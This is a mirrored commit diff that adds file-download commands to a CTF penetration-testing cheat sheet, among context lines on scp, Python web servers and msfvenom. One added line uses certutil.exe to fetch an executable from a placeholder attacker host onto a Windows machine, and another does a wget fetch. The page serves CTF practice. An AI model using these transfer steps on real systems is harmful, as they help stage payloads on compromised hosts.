mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-10 06:34:17 +00:00
Update Cheat Sheet.md
This commit is contained in:
parent
07063bda40
commit
41e3de257b
1 changed files with 8 additions and 0 deletions
|
@ -44,6 +44,10 @@ scp file/you/want `user@ip`:/path/to/store <br/>
|
|||
python -m SimpleHTTPServer [port] `By default will listen on 8000`<br/>
|
||||
python3 -m http.server [port] `By default will listen on 8000`<br/>
|
||||
|
||||
### Downloading Files
|
||||
|
||||
wget http://<ip>:port/<file>
|
||||
|
||||
# Windows
|
||||
|
||||
### Adding User
|
||||
|
@ -71,6 +75,10 @@ dir /a `show all hidden files & folder`<br/>
|
|||
dir /a:d `show only hidden folder`<br/>
|
||||
dir /a:h `show only hidden files`<br/>
|
||||
|
||||
### Downloading Files
|
||||
|
||||
certutil.exe -urlcache -f http://<ip>:<port>/<file> ouput.exe
|
||||
|
||||
# Msfvenom
|
||||
### List All Payloads
|
||||
msfvenom -l payloads
|
||||
|
|
Loading…
Reference in a new issue